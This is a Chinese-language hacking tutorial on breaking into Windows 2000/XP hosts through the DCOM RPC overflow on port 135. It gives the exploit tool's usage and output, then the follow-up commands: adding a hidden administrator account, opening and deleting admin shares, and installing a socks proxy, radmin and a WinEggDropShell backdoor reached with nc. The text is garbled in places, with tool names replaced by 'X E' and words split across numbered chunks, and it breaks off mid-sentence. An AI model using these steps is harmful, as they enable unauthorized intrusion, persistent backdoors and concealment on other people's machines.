利用dcomrpc远程溢出漏洞入侵主机

1、最近，网上非常流行 dcomrpc ，那今天我们就教你详细的利用 dcomrpc 入侵。和入侵之后必 须做什么。需要的工具：很好的：X E扫描工具：X E溢出攻击工具：RpcDcom（通用溢出工具）脚本开启 telnet 工具： X E X E代理：X E后门程序： WinEggDropShellPro3thVersion 好了，该做的都做的差不多了。先使用X E扫描一个网段。查找有rpc漏洞的机子，这个漏洞需要 135端口开放，（想必 随便扫一下就会发现有许多主机开放的 135端口 ）第一个主机就被扫出来又此漏洞。看看有没有其他的漏洞或是若口令之类的 .我们可以使用流光扫描一下其他的缺陷主机

2、 开了 3389 端口我们可以上去看一下是 xp 版本还是 win2k 是 win2k server 版本展开命令行： 查看 dcomrpc 的用法 用法 dcomrpc -d options F：/hack>cd rpc/dcomrpcRPC DCOM Expl01t coded by .：. SecurityComplied and Modified by Expl01t Usage：dcomrpc -d <host> optionsOptions：-d： Hostname to attack Required-t： Type Default： 0-r： Return a

3、ddress Default： Selected from target-p： Attack port Default： 135-l： Bindshell port Default： 666Types：0 0x0018759f： Win2k-Universal1 0x0100139d： WinXP-Universal开始进行溢出：F：/hack>cd rpc/dcomrpc -d 0RPC DCOM remote expl01t - .：. SecurityComplied and recorrected by Expl01t + Resolving host.+ Done.+ Expl

4、01tingJust wait等到出现，说明溢出成功c：/winnt/system32> 接着我们建立用户c：/winnt/system32>net user blueye$ 1111 /add 命令成功完成。把用户添加成超级管理员c：/winnt/system32>net localgroup administrators blueye$ /add 命令成功完成。看看共享开了没有没有的话把共享开开c:/winnt/system32>net share 清单是空的。c:/winnt/system32>net share ipc$ 命令成功完成。c:/winnt/s

5、ystem32>net share admin$ 命令成功完成。 到这里我们入侵告一段落 建 立 IPC$ 连 接 ，也可以使用 tftp 上传 ，先和对方建立连接 F:/hack>net use 且不显示托盘c:/winnt/system32>net start r_server 启动服务安装 sock 代理把X E copy c:/winnt/system32c:/winnt/system32>sksockserver /install安装服务c:/winnt/system32>sksockserver -config port 1234 改c:/winnt/

6、system32>sksockserver -config starttype 2 端口定在 1234 自己可以开机自动启动c:/winnt/system32>net start skserver 启动服务最后删除共享net share ipc$ /delnet share admin$ /del在安装 radmin 的时候你发现有人已经安装了。 看操作 （ 我输入的内容 ）后门连接F:/hack>nc 123456Welcome To WinEggDropShell Matrix VersionMelody #(pslist)Melody #(pskill r_server)Melody #(shell)c:/winnt/system32>(delX E)c:/winnt/system32>(delc:/winnt/system32>(delcopy 你自己的上去，然后安装 省事的办法直接导入注册表， 然后重新输入安装命令运行， 端口上面架上了密码。就可以了， 只是在原来默认这时，你就会有疑问了 ! 为什么我输入导入注册表命令不管用呢?出现什么 regedit 不是可运行的程序之类的。出现这样的情